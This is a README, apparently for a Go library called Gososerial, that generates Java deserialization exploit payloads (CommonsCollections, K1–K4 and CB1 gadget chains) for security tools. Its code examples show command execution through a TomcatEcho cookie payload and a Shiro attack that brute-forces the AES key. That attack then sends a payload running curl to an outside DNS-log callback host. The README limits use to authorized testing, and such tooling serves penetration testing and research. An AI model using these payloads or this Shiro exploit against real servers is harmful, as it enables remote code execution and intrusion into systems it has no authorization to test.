-
参考著名安全工具xray的代码
-
ysoserial是java反序列化安全方面著名的工具
-
从二进制层面解析,无需java环境,无需下载ysoserial.jar
-
输入命令直接获得payload,方便编写安全工具
-
目前已支持CC1-CC7,K1-K4和CB1链
-
支持K1和K2的TomcatEcho,HTTP头可自行取名
- download and import
go get github.com/EmYiQing/Gososerial- example
package main
import (
"fmt"
gososerial "github.com/EmYiQing/Gososerial"
)
func main() {
var payload []byte
payload = gososerial.GetCC1("calc.exe")
fmt.Println(payload)
}- how to use tomcat echo
package main
import (
gososerial "github.com/EmYiQing/Gososerial"
"..."
)
func main() {
// Testecho: expr 10 '*' 10 -> Testecho: expr 10 '*' 10
// Testcmd: expr 10 '*' 10 -> Testcmd: 100
payload := gososerial.GetCCK2TomcatEcho("Testecho", "Testcmd")
req.Cookie = AESEncrypt(payload)
req.Header["Testecho"] = "gososerial"
req.Method = "POST"
resp := httputil.sendRequest(req)
if resp.Header["Testecho"] == "gososerial" {
log.Info("find cck2 tomcat echo")
}
}- shiro scan example
package main
import (
gososerial "github.com/EmYiQing/Gososerial"
"..."
)
func main() {
// Shiro Scan Code
target := "http://shiro_ip/"
// Brust Shiro AES Key
key := shiro.CheckShiroKey(target)
if key != nil {
log.Info("find key: %s", key)
}
// Use CommonsCollections5 Payload
var payload []byte
payload = gososerial.GetCC5("curl xxxxx.ceye.io")
// Send Cookies Encrypted By AES
shiro.SendPayload(key, payload, target)
// Receive Results Using Dnslog API
if ceye.CheckResult("your_ceye_token") {
log.Info("find shiro!")
}
}- CommonsCollections1
- 支持列表
参考xray作者phith0n和koalr师傅的代码
xray: https://github.com/chaitin/xray
phith0n: https://github.com/phith0n
ysoserial: https://github.com/frohoff/ysoserial
koalr: https://github.com/zema1/ysoserial
未经授权许可使用Gososerial攻击目标是非法的
本程序应仅用于授权的安全测试与研究目的